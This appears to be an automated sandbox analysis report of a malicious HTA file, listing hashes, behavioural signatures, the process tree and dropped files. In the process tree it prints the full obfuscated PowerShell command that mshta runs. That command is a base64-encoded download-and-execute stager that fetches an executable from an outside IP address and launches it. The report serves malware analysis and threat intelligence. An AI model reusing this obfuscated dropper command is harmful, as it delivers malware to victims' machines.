Analysis

  • max time kernel
    120s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    14-11-2024 02:28

General

  • Target

    5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546.hta

  • Size

    207KB

  • MD5

    fcd22700962f05502dfd476b9fd35c11

  • SHA1

    f338e2af10c4e6e35d7f8f6e3613516150aeea71

  • SHA256

    5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546

  • SHA512

    8a2ff6c978fcb10971638458887c0794d42ac8c3cd3ad5f56644dc639d4a8bfaf6bc1bb70c23006184ef285e545dbaa5b90621a6669dc58681af62a9b0a6dc19

  • SSDEEP

    96:43F97f45Ln2rlmc265Ln2glmccBaPrKwPjTQxZ5LnI5LnCiFlmcW65Ln2OQ:43F1f8wlz2yflzRgrsCiFlzWybQ

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Evasion via Device Credential Deployment 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\5b6f4c78a2cd6af5d7ce1d063d2f5c6136a6c4fa3a7637dabb36358043c33546.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2516
    • C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE
      "C:\Windows\SysTEM32\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE" "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; iex($(Iex('[sYStEM.tExt.EnCodINg]'+[ChaR]58+[CHAr]0X3a+'UTF8.getsTring([SYsTEm.CoNVErT]'+[ChAr]0x3a+[CHAR]58+'FroMBASe64strINg('+[ChaR]0X22+'JEMzV3NmSEMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYmVyZEVGSU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1ByeSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJcWloU2dPcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3l3UmhuUUdmS1IsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV2JKYUdNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiV25XVCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkQzNXc2ZIQzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzMuNC42MS8zNDUvd2xhbmV4dHMuZXhlIiwiJEVOdjpBUFBEQVRBXHdsYW5leHQuZXhlIiwwLDApO3NUQVJULXNsZUVwKDMpO3NUYXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSI='+[chaR]0X22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1688
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2804
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\izdu6utb.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2872
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAD22.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCAD21.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2860

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RESAD22.tmp

    Filesize

    1KB

    MD5

    78ba4ba9e5cd4d1450123b290bb33f7b

    SHA1

    a345efa2b3a9a661451bdcd73fa957216475a0d9

    SHA256

    a95e272886f38db936882deb9994674cc2a43a07d8a80bb92012fa916e36fd77

    SHA512

    5741f1538d57a7399f053e387974fcbbfe4ce2f2854659dd9164cc610f07791678233c304751bb7bc3ffa46b1e4d607469e5943d837ddcac2a9b2f50dbf659e0

  • C:\Users\Admin\AppData\Local\Temp\izdu6utb.dll

    Filesize

    3KB

    MD5

    3218f868f336ca301438aeb48e571988

    SHA1

    55c770ae3601d5c090fef1d74f3bc8fade78d343

    SHA256

    227bcaafdd1ee0187da1546b91d8fcfbd30ec783757c5121d98c2455e0001fcc

    SHA512

    00155c6ba172374c16ca5d05b3e9b082c91f3a8f264bcef8b90c21f20a837caf77a545de4cd3605d723f8a647b901b0959818ce846eb4f64d587bce326b37d0c

  • C:\Users\Admin\AppData\Local\Temp\izdu6utb.pdb

    Filesize

    7KB

    MD5

    943f5fe78cba3be93ead28a8da5ba683

    SHA1

    a3cf7fe11d10fee595d7ebf1f5648ee18db07c7b

    SHA256

    b95ff72fb9f74ee921d909d6152b9b3cdce12b4d4b460c90af4ca7b644dbbaa9

    SHA512

    fc907e54b6c4ce0a25219fc29e6e3f8ce3c2a1ef119d646762523f591b1203a411ea2de46d9f00827169fe7a09fad176618831a9dc04fc8546fccdef84935a7f

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    0e0ce348f6ba941e618f1f455f29bea6

    SHA1

    9ba4c3c056c3e0c5997fd8eda7812d1b1a353324

    SHA256

    06242b3b804c45f717ffc02587d79a5cb14a98cb8baa625601f31fdaab3c1b35

    SHA512

    2af0e2e84d46fda69b4fb3bafebff13473f15199c943f1d93f9c08f901af18cb03f44e0f1f7b4f333d465e6e000b5fc4134d5a29e58fe671be5ad9451f4c27b0

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCAD21.tmp

    Filesize

    652B

    MD5

    a39953edc790fd3c055982264d45ebd9

    SHA1

    030b6c5c9f542e7a2c11e31e6f6cd192fe625d28

    SHA256

    73e60fa13a32189fc6acb4f43438c43bea75ab6c954610c83a0e03adb8f5498b

    SHA512

    21f55a0a46f8326aaba23334a6693dd0bea8547156fdab2b350958d670d00b47ab8a834f1beef1aece6b4eab761032efab633ded776481f038cb8cde29f9192d

  • \??\c:\Users\Admin\AppData\Local\Temp\izdu6utb.0.cs

    Filesize

    473B

    MD5

    4af98cbe7b888e1e92e1aa8a35732223

    SHA1

    75d54c91355c97fc9b1c3453efea5dccd817ed42

    SHA256

    596b94a3cb934e9261ddf50733d26c0147c5cb57e1215cabed32fee719782f34

    SHA512

    1127001fd6eb53db939188df14cdd466f44103d8386e51ffaeaaa56569e137367388097c37422fbe332f6b7ced9f4959058f1235f106efcc03e492e009705ff3

  • \??\c:\Users\Admin\AppData\Local\Temp\izdu6utb.cmdline

    Filesize

    309B

    MD5

    39436a3ec2a28845767ca16383e33bd1

    SHA1

    5003dd9e8157d5f18e1610fcfb89da7f0e5b6b27

    SHA256

    805a6e724b1d941e225b313dfaec1a58cf13ede9db57896dc4acfefca1731992

    SHA512

    eff698496ff9504ddff80e7d87415ae24cf3d3888165f5bf01aa0390285db7f84450dd55a833d0ae04b3d686b04578eb340cd23da5e3931d297ddda775be7097